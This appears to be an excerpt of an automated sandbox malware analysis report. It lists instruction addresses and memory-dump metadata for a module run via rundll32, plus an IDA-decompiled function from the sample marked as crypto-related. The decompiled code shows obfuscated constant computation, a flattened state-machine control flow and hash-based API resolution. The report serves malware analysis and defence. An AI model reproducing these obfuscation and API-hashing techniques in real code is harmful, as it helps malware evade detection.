                                                                                                                          0x007ac6b7
                                                                                                                          0x007ac6bf
                                                                                                                          0x007ac6c7
                                                                                                                          0x007ac6cf
                                                                                                                          0x007ac6d7
                                                                                                                          0x007ac6e2
                                                                                                                          0x007ac6e4
                                                                                                                          0x007ac6e9
                                                                                                                          0x007ac6ef
                                                                                                                          0x007ac6f7
                                                                                                                          0x007ac6fc
                                                                                                                          0x007ac704
                                                                                                                          0x007ac70c
                                                                                                                          0x007ac714
                                                                                                                          0x007ac719
                                                                                                                          0x007ac721
                                                                                                                          0x007ac729
                                                                                                                          0x007ac731
                                                                                                                          0x007ac736
                                                                                                                          0x007ac73e
                                                                                                                          0x007ac746
                                                                                                                          0x007ac74b
                                                                                                                          0x007ac750
                                                                                                                          0x007ac758
                                                                                                                          0x007ac760
                                                                                                                          0x007ac76c
                                                                                                                          0x007ac771
                                                                                                                          0x007ac777
                                                                                                                          0x007ac77f
                                                                                                                          0x007ac787
                                                                                                                          0x007ac793
                                                                                                                          0x007ac796
                                                                                                                          0x007ac79a
                                                                                                                          0x007ac7a2
                                                                                                                          0x007ac7aa
                                                                                                                          0x007ac7b7
                                                                                                                          0x007ac7bb
                                                                                                                          0x007ac7c3
                                                                                                                          0x007ac7d0
                                                                                                                          0x007ac7d4
                                                                                                                          0x007ac7d9
                                                                                                                          0x007ac7e1
                                                                                                                          0x007ac7e9
                                                                                                                          0x007ac7f1
                                                                                                                          0x007ac7f9
                                                                                                                          0x007ac801
                                                                                                                          0x007ac813
                                                                                                                          0x007ac817
                                                                                                                          0x007ac81f
                                                                                                                          0x007ac827
                                                                                                                          0x007ac834
                                                                                                                          0x007ac838
                                                                                                                          0x007ac840
                                                                                                                          0x007ac848
                                                                                                                          0x007ac850
                                                                                                                          0x007ac858
                                                                                                                          0x007ac860
                                                                                                                          0x007ac868
                                                                                                                          0x007ac870
                                                                                                                          0x007ac878
                                                                                                                          0x007ac880
                                                                                                                          0x007ac888
                                                                                                                          0x007ac890
                                                                                                                          0x007ac898
                                                                                                                          0x007ac8a5
                                                                                                                          0x007ac8ae
                                                                                                                          0x007ac8b2
                                                                                                                          0x007ac8ba
                                                                                                                          0x007ac8c2
                                                                                                                          0x007ac8ca
                                                                                                                          0x007ac8cf
                                                                                                                          0x007ac8d7
                                                                                                                          0x007ac8df
                                                                                                                          0x007ac8e4
                                                                                                                          0x007ac8e9
                                                                                                                          0x007ac8f1
                                                                                                                          0x007ac8f9
                                                                                                                          0x007ac901
                                                                                                                          0x007ac909
                                                                                                                          0x007ac911
                                                                                                                          0x007ac911
                                                                                                                          0x007ac919
                                                                                                                          0x007ac919
                                                                                                                          0x007ac919
                                                                                                                          0x007ac919
                                                                                                                          0x007ac91b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007ac921
                                                                                                                          0x007ac9e2
                                                                                                                          0x007ac9e3
                                                                                                                          0x007ac9e4
                                                                                                                          0x007ac9e9
                                                                                                                          0x007ac9ec
                                                                                                                          0x007ac9f1
                                                                                                                          0x00000000
                                                                                                                          0x007ac927
                                                                                                                          0x007ac92d
                                                                                                                          0x007ac9c0
                                                                                                                          0x007ac9c1
                                                                                                                          0x007ac9c2
                                                                                                                          0x007ac9c7
                                                                                                                          0x007ac9ca
                                                                                                                          0x007ac9cf
                                                                                                                          0x00000000
                                                                                                                          0x007ac933
                                                                                                                          0x007ac939
                                                                                                                          0x007ac99e
                                                                                                                          0x007ac99f
                                                                                                                          0x007ac9a0
                                                                                                                          0x007ac9a5
                                                                                                                          0x007ac9a8
                                                                                                                          0x007ac9ad
                                                                                                                          0x00000000
                                                                                                                          0x007ac93b
                                                                                                                          0x007ac941
                                                                                                                          0x007ac97d
                                                                                                                          0x007ac981
                                                                                                                          0x007ac986
                                                                                                                          0x007ac989
                                                                                                                          0x007ac98e
                                                                                                                          0x00000000
                                                                                                                          0x007ac943
                                                                                                                          0x007ac949
                                                                                                                          0x00000000
                                                                                                                          0x007ac94f
                                                                                                                          0x007ac95b
                                                                                                                          0x007ac95c
                                                                                                                          0x007ac95d
                                                                                                                          0x007ac962
                                                                                                                          0x007ac965
                                                                                                                          0x007ac96a
                                                                                                                          0x00000000
                                                                                                                          0x007ac96a
                                                                                                                          0x007ac949
                                                                                                                          0x007ac941
                                                                                                                          0x007ac939
                                                                                                                          0x007ac92d
                                                                                                                          0x007aca5f
                                                                                                                          0x007aca68
                                                                                                                          0x007aca68
                                                                                                                          0x007ac9fe
                                                                                                                          0x007aca26
                                                                                                                          0x007aca27
                                                                                                                          0x007aca28
                                                                                                                          0x007aca2d
                                                                                                                          0x007aca30
                                                                                                                          0x007aca32
                                                                                                                          0x00000000
                                                                                                                          0x007aca00
                                                                                                                          0x007aca06
                                                                                                                          0x007aca5d
                                                                                                                          0x007aca08
                                                                                                                          0x007aca0e
                                                                                                                          0x00000000
                                                                                                                          0x007aca10
                                                                                                                          0x007aca10
                                                                                                                          0x00000000
                                                                                                                          0x007aca10
                                                                                                                          0x007aca0e
                                                                                                                          0x007aca06
                                                                                                                          0x00000000
                                                                                                                          0x007aca34
                                                                                                                          0x007aca34
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: )L$Eh$QGf$Z$,$w)!$}+$%l$i _
                                                                                                                          • API String ID: 0-1553751006
                                                                                                                          • Opcode ID: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                          • Instruction ID: 47ceba52b75d9ec84ff00e7bb3904bb94719c269a3c0fe34d97b5d69ab756338
                                                                                                                          • Opcode Fuzzy Hash: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                          • Instruction Fuzzy Hash: 01A111B28083419FC399CF65D48A80BFBE1BBC5758F504A1DF595A6220D3B9DA49CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007AF435 Relevance: 9.3, Strings: 7, Instructions: 536COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E007AF435(intOrPtr* __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				void* _t551;
				void* _t554;
				signed int _t560;
				void* _t563;
				int _t566;
				void* _t580;
				signed int* _t582;
				void* _t587;
				signed int _t595;
				void* _t598;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				intOrPtr* _t610;
				signed int _t634;
				void* _t659;
				signed int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				void* _t682;
				void* _t683;
				void* _t686;
				void* _t687;
				signed int _t692;
				signed int _t693;
				signed int* _t694;
				void* _t698;

				_t694 =  &_v520;
				_v296 = __edx;
				_v456 = __ecx;
				_v308 = 0x7c82e0;
				_v308 = _v308 ^ 0x9529f8b7;
				_v308 = _v308 ^ 0x95557a57;
				_v444 = 0xbd655a;
				_v444 = _v444 + 0x6586;
				_v444 = _v444 + 0xffff1486;
				_v444 = _v444 ^ 0x00b10b5d;
				_v360 = 0x6df28f;
				_v360 = _v360 >> 0xc;
				_v360 = _v360 ^ 0xc93a0f00;
				_v360 = _v360 ^ 0xc93b57a7;
				_v380 = 0x803da4;
				_v380 = _v380 + 0x81b0;
				_v380 = _v380 << 0x10;
				_v380 = _v380 ^ 0xbf59b73f;
				_v484 = 0xdeaf13;
				_v484 = _v484 | 0x05ba16e8;
				_v484 = _v484 + 0xffff5e7b;
				_v484 = _v484 + 0x21a5;
				_v484 = _v484 ^ 0x05f35408;
				_v516 = 0x9c12e3;
				_v516 = _v516 >> 5;
				_v516 = _v516 + 0x3879;
				_t686 = 0x618a3a9;
				_t676 = 0x46;
				_v516 = _v516 / _t676;
				_v516 = _v516 ^ 0x000beb5e;
				_v404 = 0x49e9fe;
				_v404 = _v404 + 0x1375;
				_v404 = _v404 | 0x014362a3;
				_v404 = _v404 ^ 0x01430578;
				_v408 = 0xd49d0c;
				_v408 = _v408 + 0x89ee;
				_v408 = _v408 | 0xbbfa4d8a;
				_v408 = _v408 ^ 0xbbf95772;
				_v504 = 0x33cefe;
				_v504 = _v504 >> 0xa;
				_v504 = _v504 >> 0xd;
				_v504 = _v504 + 0xffff4738;
				_v504 = _v504 ^ 0xfff61340;
				_v388 = 0x38423a;
				_t75 =  &_v388; // 0x38423a
				_t601 = 0x7b;
				_v388 =  *_t75 * 0x2c;
				_v388 = _v388 + 0x7a90;
				_v388 = _v388 ^ 0x09a92ca6;
				_v396 = 0x89c34a;
				_v396 = _v396 >> 6;
				_v396 = _v396 | 0xaa955d3e;
				_v396 = _v396 ^ 0xaa9cf099;
				_v316 = 0x54e1fb;
				_v316 = _v316 + 0xffff88b2;
				_v316 = _v316 ^ 0x0053b1cb;
				_v392 = 0xd67855;
				_v392 = _v392 + 0xd739;
				_v392 = _v392 * 0x34;
				_v392 = _v392 ^ 0x2bb8cf2c;
				_v512 = 0x9dc1ac;
				_v512 = _v512 | 0xff1b5e8c;
				_v512 = _v512 / _t601;
				_v512 = _v512 + 0xc237;
				_v512 = _v512 ^ 0x02115509;
				_v368 = 0xb0c27;
				_v368 = _v368 * 0x3a;
				_v368 = _v368 + 0x9417;
				_v368 = _v368 ^ 0x028ae81d;
				_v352 = 0x7ea940;
				_v352 = _v352 + 0xffff6a40;
				_v352 = _v352 | 0x1d7a7563;
				_v352 = _v352 ^ 0x1d74a207;
				_v340 = 0xd37cb9;
				_v340 = _v340 >> 5;
				_v340 = _v340 ^ 0x00021b7e;
				_v384 = 0xc54f7c;
				_v384 = _v384 | 0xe1c129a4;
				_v384 = _v384 << 6;
				_v384 = _v384 ^ 0x7152788e;
				_v320 = 0xafdf9b;
				_v320 = _v320 | 0x588bef45;
				_v320 = _v320 ^ 0x58ad1127;
				_v508 = 0x7882a6;
				_v508 = _v508 ^ 0x5ae648f7;
				_t677 = 0x7e;
				_v508 = _v508 / _t677;
				_v508 = _v508 + 0xffff266f;
				_v508 = _v508 ^ 0x00b4570c;
				_v344 = 0x25ec7c;
				_t158 =  &_v344; // 0x25ec7c
				_t692 = 0x77;
				_v344 =  *_t158 * 0x48;
				_v344 = _v344 ^ 0x0aab681c;
				_v332 = 0xac456;
				_v332 = _v332 ^ 0x143b2d92;
				_v332 = _v332 ^ 0x1438ce6d;
				_v436 = 0x1dd68;
				_v436 = _v436 + 0x1e14;
				_v436 = _v436 / _t692;
				_v436 = _v436 ^ 0x000407e3;
				_v468 = 0x975814;
				_v468 = _v468 | 0x165c3dad;
				_v468 = _v468 >> 3;
				_v468 = _v468 + 0x9a99;
				_v468 = _v468 ^ 0x02d4af38;
				_v428 = 0xd1fa32;
				_v428 = _v428 + 0x34cd;
				_v428 = _v428 >> 0xa;
				_v428 = _v428 ^ 0x000c7c43;
				_v372 = 0xb93604;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 + 0x569f;
				_v372 = _v372 ^ 0x0001c97c;
				_v312 = 0xb8b780;
				_v312 = _v312 / _t601;
				_v312 = _v312 ^ 0x0009bb57;
				_v364 = 0xc6b8c5;
				_v364 = _v364 >> 4;
				_v364 = _v364 << 0xf;
				_v364 = _v364 ^ 0x35c8234d;
				_v500 = 0x5d2db3;
				_v500 = _v500 | 0xa4ec7bca;
				_v500 = _v500 * 0x42;
				_v500 = _v500 + 0xffff6871;
				_v500 = _v500 ^ 0x8955fb09;
				_v492 = 0xf8ac1c;
				_v492 = _v492 + 0xd489;
				_v492 = _v492 | 0x938b5662;
				_v492 = _v492 << 6;
				_v492 = _v492 ^ 0xfef6fac0;
				_v356 = 0x80a8a7;
				_v356 = _v356 >> 3;
				_v356 = _v356 + 0xffff1aa9;
				_v356 = _v356 ^ 0x00023cc5;
				_v420 = 0x29f504;
				_v420 = _v420 ^ 0x96d25191;
				_v420 = _v420 << 0xa;
				_v420 = _v420 ^ 0xee96722c;
				_v476 = 0x6526e6;
				_t250 =  &_v476; // 0x6526e6
				_t602 = 9;
				_t678 = 0x5e;
				_v476 =  *_t250 * 0x65;
				_t252 =  &_v476; // 0x6526e6
				_v476 =  *_t252 * 0x5d;
				_v476 = _v476 + 0xffffa50d;
				_v476 = _v476 ^ 0x7f6d4504;
				_v304 = 0x6f90;
				_v304 = _v304 + 0xffffb625;
				_v304 = _v304 ^ 0x0000ce69;
				_v348 = 0xd48165;
				_v348 = _v348 * 0x4f;
				_v348 = _v348 + 0xa298;
				_v348 = _v348 ^ 0x41980148;
				_v412 = 0x7e685b;
				_t271 =  &_v412; // 0x7e685b
				_v412 =  *_t271 * 0x1d;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 ^ 0x000f1110;
				_v460 = 0xd80dae;
				_v460 = _v460 * 0x4a;
				_v460 = _v460 << 9;
				_v460 = _v460 >> 5;
				_v460 = _v460 ^ 0x073a202e;
				_v324 = 0x2acd4f;
				_v324 = _v324 ^ 0x1744d618;
				_v324 = _v324 ^ 0x1766082c;
				_v400 = 0xe6723b;
				_v400 = _v400 ^ 0x220d80d9;
				_v400 = _v400 ^ 0x0161a8c1;
				_v400 = _v400 ^ 0x238d1a3c;
				_v376 = 0xaaa6;
				_v376 = _v376 + 0xd31a;
				_v376 = _v376 + 0xfffff53b;
				_v376 = _v376 ^ 0x00079406;
				_v452 = 0xe6cc76;
				_v452 = _v452 ^ 0xa4c29e28;
				_v452 = _v452 / _t602;
				_v452 = _v452 ^ 0x123fe3c8;
				_v520 = 0x822cac;
				_v520 = _v520 / _t678;
				_v520 = _v520 << 4;
				_v520 = _v520 << 9;
				_v520 = _v520 ^ 0x2c5f9d39;
				_v440 = 0xafb195;
				_v440 = _v440 + 0xffff123a;
				_v440 = _v440 >> 0xa;
				_v440 = _v440 ^ 0x0003dc41;
				_v448 = 0xdf86e4;
				_v448 = _v448 ^ 0xac60bb5d;
				_v448 = _v448 ^ 0x5238faed;
				_v448 = _v448 ^ 0xfe8be764;
				_v336 = 0x3e14c9;
				_v336 = _v336 << 7;
				_v336 = _v336 ^ 0x1f0fc953;
				_v496 = 0x4885f3;
				_v496 = _v496 * 0x25;
				_v496 = _v496 + 0x3aa8;
				_v496 = _v496 + 0xffff73aa;
				_v496 = _v496 ^ 0x0a7b30ee;
				_v480 = 0xca6b34;
				_v480 = _v480 >> 9;
				_v480 = _v480 + 0xfb6a;
				_v480 = _v480 / _t692;
				_v480 = _v480 ^ 0x000164ed;
				_v432 = 0xb19133;
				_t679 = 0x63;
				_t693 = _v296;
				_v432 = _v432 * 0x53;
				_v432 = _v432 >> 0x10;
				_v432 = _v432 ^ 0x00018cb4;
				_v328 = 0xdb466c;
				_t603 = _v296;
				_v328 = _v328 / _t679;
				_v328 = _v328 ^ 0x000e2190;
				_v488 = 0xd48740;
				_t680 = 0x44;
				_v488 = _v488 * 7;
				_v488 = _v488 * 0x66;
				_v488 = _v488 + 0x34f;
				_v488 = _v488 ^ 0x50c19e73;
				_v424 = 0xacfab2;
				_v424 = _v424 / _t680;
				_v424 = _v424 | 0xedf008b5;
				_v424 = _v424 ^ 0xedf22909;
				_v472 = 0x2e74a8;
				_v472 = _v472 * 0x3f;
				_v472 = _v472 ^ 0x6424471f;
				_v472 = _v472 >> 0xb;
				_v472 = _v472 ^ 0x0009d0c0;
				_v416 = 0x7e19d4;
				_v416 = _v416 << 0xd;
				_v416 = _v416 + 0x1081;
				_v416 = _v416 ^ 0xc3344569;
				_v464 = 0xa74bb7;
				_v464 = _v464 >> 0xb;
				_v464 = _v464 + 0x9c4;
				_v464 = _v464 >> 6;
				_v464 = _v464 ^ 0x000976a8;
				while(1) {
					L1:
					_t551 = 0xf168e34;
					do {
						while(1) {
							L2:
							_t698 = _t686 - 0x7498ebf;
							if(_t698 > 0) {
								break;
							}
							if(_t698 == 0) {
								_push(_v496);
								_push(_v336);
								_push(_v448);
								_t580 = E00797F1D(_v480, _t603, _v432, E007A8606(_v440, 0x791560, __eflags), _v328, _v292 - _t603, _v488);
								E0079A8B0(_v424, _t577, _v472);
								_t582 = _v296;
								 *_t582 = _t693;
								_t582[1] = _t603 + _t580 - _t693;
								goto L29;
							}
							if(_t686 == 0x488924) {
								_t682 = _t682 +  *((intOrPtr*)(_t610 + 4));
								_push(_t610);
								_push(_t610);
								_t693 = E00797FF2(_t682);
								__eflags = _t693;
								_t551 = 0xf168e34;
								_t610 = _v456;
								_t686 =  !=  ? 0xf168e34 : 0xe639f63;
								continue;
							}
							if(_t686 == 0x123a276) {
								_push(_v468);
								_push(_v436);
								_t587 = E007ADCF7(_v332, 0x7915c0, __eflags);
								_push( &_v256);
								_push(_t587);
								_push(_t682);
								_push(_v300);
								 *((intOrPtr*)(E0079A42D(0xab2a8d8a, 0x2b7)))();
								E0079A8B0(_v428, _t587, _v372);
								_t694 =  &(_t694[5]);
								_t686 = 0x488924;
								L12:
								_t610 = _v456;
								while(1) {
									L1:
									_t551 = 0xf168e34;
									goto L2;
								}
							}
							if(_t686 != 0x57ff6e7) {
								if(_t686 == 0x5f676f3) {
									_t598 = E007A0AE0(8, 1);
									_push(_v516);
									_t682 = _t598;
									_push( &_v288);
									_push(_t682);
									_push(9);
									E007980E3(_v380, _v484);
									_t686 = 0x7f96e60;
									L11:
									_t694 =  &(_t694[6]);
									goto L12;
								} else {
									if(_t686 != 0x618a3a9) {
										goto L28;
									} else {
										_t686 = 0x5f676f3;
										continue;
									}
								}
								L30:
								return _t595;
							}
							_t682 = 0x4000;
							_push(_t610);
							_push(_t610);
							_t595 = E00797FF2(0x4000);
							_v300 = _t595;
							__eflags = _t595;
							if(__eflags != 0) {
								_t686 = 0x123a276;
								goto L12;
							}
							goto L30;
						}
						__eflags = _t686 - 0x7f96e60;
						if(_t686 == 0x7f96e60) {
							_t554 = E007A0AE0(0x10, 4);
							_push(_v396);
							_t682 = _t554;
							_push( &_v128);
							_push(_t682);
							_push(0xb);
							E007980E3(_v504, _v388);
							_t610 = _v456;
							_t694 =  &(_t694[6]);
							_t686 = 0x8d9b717;
							_t551 = 0xf168e34;
							goto L28;
						} else {
							__eflags = _t686 - 0x8d9b717;
							if(_t686 == 0x8d9b717) {
								_t687 =  &_v256;
								_t659 = E007A0AE0(0x10, 8);
								_t560 = _v308;
								__eflags = _t560 - _t659;
								if(_t560 < _t659) {
									_t675 = _t659 - _t560;
									_t683 = _t687;
									_t634 = _t675 >> 1;
									__eflags = _t634;
									_t566 = memset(_t683, 0x2d002d, _t634 << 2);
									asm("adc ecx, ecx");
									_t687 = _t687 + _t675 * 2;
									memset(_t683 + _t634, _t566, 0);
									_t694 =  &(_t694[6]);
								}
								_t563 = E007A0AE0(0x10, 8);
								_push(_v384);
								_t682 = _t563;
								_push(_t687);
								_push(_t682);
								_push(0xb);
								E007980E3(_v352, _v340);
								_t686 = 0x57ff6e7;
								goto L11;
							} else {
								__eflags = _t686 - 0xa9d081a;
								if(_t686 == 0xa9d081a) {
									E0079ED7E(_v452, _t603, _v520,  *_t610,  *((intOrPtr*)(_t610 + 4)));
									_t610 = _v456;
									_t694 =  &(_t694[3]);
									_t686 = 0x7498ebf;
									_t603 = _t603 +  *((intOrPtr*)(_t610 + 4));
									goto L1;
								} else {
									__eflags = _t686 - 0xe639f63;
									if(_t686 == 0xe639f63) {
										E007A8519(_v416, _v464, _v300);
										return 0;
									}
									__eflags = _t686 - _t551;
									if(__eflags != 0) {
										goto L28;
									} else {
										_push(_v476);
										_push(_v420);
										_v292 = _t682 + _t693;
										_push(_v356);
										_t603 = E007AC0C1( &_v128, __eflags,  &_v288, E007A8606(_v492, 0x791610, __eflags),  &_v256, _v348, _v412, _v460, _t693, _t682 + _t693 - _t693, _v324) + _t693;
										E0079A8B0(_v400, _t572, _v376);
										_t694 =  &(_t694[0xd]);
										_t686 = 0xa9d081a;
										goto L12;
									}
								}
							}
						}
						goto L30;
						L28:
						__eflags = _t686 - 0x7bf1275;
					} while (__eflags != 0);
					L29:
					return _v300;
				}
			}






























































































                                                                                                                          0x007af435
                                                                                                                          0x007af43f
                                                                                                                          0x007af446
                                                                                                                          0x007af44a
                                                                                                                          0x007af455
                                                                                                                          0x007af460
                                                                                                                          0x007af46b
                                                                                                                          0x007af473
                                                                                                                          0x007af47b
                                                                                                                          0x007af483
                                                                                                                          0x007af48b
                                                                                                                          0x007af496
                                                                                                                          0x007af49e
                                                                                                                          0x007af4a9
                                                                                                                          0x007af4b4
                                                                                                                          0x007af4bf
                                                                                                                          0x007af4ca
                                                                                                                          0x007af4d2
                                                                                                                          0x007af4dd
                                                                                                                          0x007af4e5
                                                                                                                          0x007af4ed
                                                                                                                          0x007af4f5
                                                                                                                          0x007af4fd
                                                                                                                          0x007af505
                                                                                                                          0x007af50d
                                                                                                                          0x007af512
                                                                                                                          0x007af51e
                                                                                                                          0x007af527
                                                                                                                          0x007af52c
                                                                                                                          0x007af532
                                                                                                                          0x007af53a
                                                                                                                          0x007af545
                                                                                                                          0x007af550
                                                                                                                          0x007af55b
                                                                                                                          0x007af566
                                                                                                                          0x007af571
                                                                                                                          0x007af57c
                                                                                                                          0x007af587
                                                                                                                          0x007af592
                                                                                                                          0x007af59a
                                                                                                                          0x007af59f
                                                                                                                          0x007af5a4
                                                                                                                          0x007af5ac
                                                                                                                          0x007af5b4
                                                                                                                          0x007af5bf
                                                                                                                          0x007af5c7
                                                                                                                          0x007af5c8
                                                                                                                          0x007af5cf
                                                                                                                          0x007af5da
                                                                                                                          0x007af5e5
                                                                                                                          0x007af5f0
                                                                                                                          0x007af5f8
                                                                                                                          0x007af603
                                                                                                                          0x007af60e
                                                                                                                          0x007af619
                                                                                                                          0x007af624
                                                                                                                          0x007af62f
                                                                                                                          0x007af63a
                                                                                                                          0x007af64d
                                                                                                                          0x007af654
                                                                                                                          0x007af65f
                                                                                                                          0x007af667
                                                                                                                          0x007af675
                                                                                                                          0x007af679
                                                                                                                          0x007af681
                                                                                                                          0x007af689
                                                                                                                          0x007af69c
                                                                                                                          0x007af6a3
                                                                                                                          0x007af6ae
                                                                                                                          0x007af6bb
                                                                                                                          0x007af6c6
                                                                                                                          0x007af6d1
                                                                                                                          0x007af6dc
                                                                                                                          0x007af6e7
                                                                                                                          0x007af6f2
                                                                                                                          0x007af6fa
                                                                                                                          0x007af705
                                                                                                                          0x007af710
                                                                                                                          0x007af71b
                                                                                                                          0x007af723
                                                                                                                          0x007af72e
                                                                                                                          0x007af739
                                                                                                                          0x007af744
                                                                                                                          0x007af74f
                                                                                                                          0x007af757
                                                                                                                          0x007af765
                                                                                                                          0x007af76a
                                                                                                                          0x007af76e
                                                                                                                          0x007af776
                                                                                                                          0x007af77e
                                                                                                                          0x007af789
                                                                                                                          0x007af793
                                                                                                                          0x007af794
                                                                                                                          0x007af79b
                                                                                                                          0x007af7a6
                                                                                                                          0x007af7b1
                                                                                                                          0x007af7bc
                                                                                                                          0x007af7c7
                                                                                                                          0x007af7cf
                                                                                                                          0x007af7df
                                                                                                                          0x007af7e3
                                                                                                                          0x007af7eb
                                                                                                                          0x007af7f3
                                                                                                                          0x007af7fb
                                                                                                                          0x007af800
                                                                                                                          0x007af808
                                                                                                                          0x007af810
                                                                                                                          0x007af818
                                                                                                                          0x007af820
                                                                                                                          0x007af825
                                                                                                                          0x007af82d
                                                                                                                          0x007af838
                                                                                                                          0x007af840
                                                                                                                          0x007af84b
                                                                                                                          0x007af856
                                                                                                                          0x007af86a
                                                                                                                          0x007af871
                                                                                                                          0x007af87c
                                                                                                                          0x007af887
                                                                                                                          0x007af88f
                                                                                                                          0x007af897
                                                                                                                          0x007af8a2
                                                                                                                          0x007af8aa
                                                                                                                          0x007af8b7
                                                                                                                          0x007af8bb
                                                                                                                          0x007af8c3
                                                                                                                          0x007af8cb
                                                                                                                          0x007af8d3
                                                                                                                          0x007af8db
                                                                                                                          0x007af8e3
                                                                                                                          0x007af8e8
                                                                                                                          0x007af8f0
                                                                                                                          0x007af8fb
                                                                                                                          0x007af903
                                                                                                                          0x007af90e
                                                                                                                          0x007af919
                                                                                                                          0x007af921
                                                                                                                          0x007af929
                                                                                                                          0x007af930
                                                                                                                          0x007af938
                                                                                                                          0x007af940
                                                                                                                          0x007af947
                                                                                                                          0x007af94a
                                                                                                                          0x007af94b
                                                                                                                          0x007af94f
                                                                                                                          0x007af954
                                                                                                                          0x007af958
                                                                                                                          0x007af960
                                                                                                                          0x007af968
                                                                                                                          0x007af973
                                                                                                                          0x007af97e
                                                                                                                          0x007af989
                                                                                                                          0x007af99c
                                                                                                                          0x007af9a3
                                                                                                                          0x007af9ae
                                                                                                                          0x007af9b9
                                                                                                                          0x007af9c1
                                                                                                                          0x007af9c6
                                                                                                                          0x007af9ca
                                                                                                                          0x007af9cf
                                                                                                                          0x007af9d7
                                                                                                                          0x007af9e4
                                                                                                                          0x007af9e8
                                                                                                                          0x007af9ed
                                                                                                                          0x007af9f2
                                                                                                                          0x007af9fa
                                                                                                                          0x007afa05
                                                                                                                          0x007afa10
                                                                                                                          0x007afa1b
                                                                                                                          0x007afa26
                                                                                                                          0x007afa31
                                                                                                                          0x007afa3c
                                                                                                                          0x007afa47
                                                                                                                          0x007afa52
                                                                                                                          0x007afa5d
                                                                                                                          0x007afa68
                                                                                                                          0x007afa73
                                                                                                                          0x007afa7b
                                                                                                                          0x007afa8b
                                                                                                                          0x007afa8f
                                                                                                                          0x007afa97
                                                                                                                          0x007afaa7
                                                                                                                          0x007afaab
                                                                                                                          0x007afab0
                                                                                                                          0x007afab5
                                                                                                                          0x007afabd
                                                                                                                          0x007afac5
                                                                                                                          0x007afacd
                                                                                                                          0x007afad2
                                                                                                                          0x007afada
                                                                                                                          0x007afae2
                                                                                                                          0x007afaea
                                                                                                                          0x007afaf2
                                                                                                                          0x007afafa
                                                                                                                          0x007afb05
                                                                                                                          0x007afb0d
                                                                                                                          0x007afb18
                                                                                                                          0x007afb25
                                                                                                                          0x007afb29
                                                                                                                          0x007afb31
                                                                                                                          0x007afb39
                                                                                                                          0x007afb41
                                                                                                                          0x007afb49
                                                                                                                          0x007afb4e
                                                                                                                          0x007afb5c
                                                                                                                          0x007afb62
                                                                                                                          0x007afb6a
                                                                                                                          0x007afb79
                                                                                                                          0x007afb7c
                                                                                                                          0x007afb83
                                                                                                                          0x007afb87
                                                                                                                          0x007afb8c
                                                                                                                          0x007afb94
                                                                                                                          0x007afbaa
                                                                                                                          0x007afbb1
                                                                                                                          0x007afbb8
                                                                                                                          0x007afbc3
                                                                                                                          0x007afbd0
                                                                                                                          0x007afbd1
                                                                                                                          0x007afbda
                                                                                                                          0x007afbde
                                                                                                                          0x007afbe6
                                                                                                                          0x007afbee
                                                                                                                          0x007afc03
                                                                                                                          0x007afc07
                                                                                                                          0x007afc0f
                                                                                                                          0x007afc17
                                                                                                                          0x007afc24
                                                                                                                          0x007afc28
                                                                                                                          0x007afc30
                                                                                                                          0x007afc35
                                                                                                                          0x007afc3d
                                                                                                                          0x007afc45
                                                                                                                          0x007afc4a
                                                                                                                          0x007afc52
                                                                                                                          0x007afc5a
                                                                                                                          0x007afc62
                                                                                                                          0x007afc67
                                                                                                                          0x007afc6f
                                                                                                                          0x007afc74
                                                                                                                          0x007afc7c
                                                                                                                          0x007afc7c
                                                                                                                          0x007afc7c
                                                                                                                          0x007afc81
                                                                                                                          0x007afc81
                                                                                                                          0x007afc81
                                                                                                                          0x007afc81
                                                                                                                          0x007afc87
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007afc8d
                                                                                                                          0x007affc3
                                                                                                                          0x007affcc
                                                                                                                          0x007affd3
                                                                                                                          0x007b000b
                                                                                                                          0x007b001f
                                                                                                                          0x007b0024
                                                                                                                          0x007b0030
                                                                                                                          0x007b0032
                                                                                                                          0x00000000
                                                                                                                          0x007b0032
                                                                                                                          0x007afc99
                                                                                                                          0x007afdb2
                                                                                                                          0x007afdc5
                                                                                                                          0x007afdc6
                                                                                                                          0x007afdcc
                                                                                                                          0x007afdd4
                                                                                                                          0x007afdd6
                                                                                                                          0x007afddc
                                                                                                                          0x007afde0
                                                                                                                          0x00000000
                                                                                                                          0x007afde0
                                                                                                                          0x007afca5
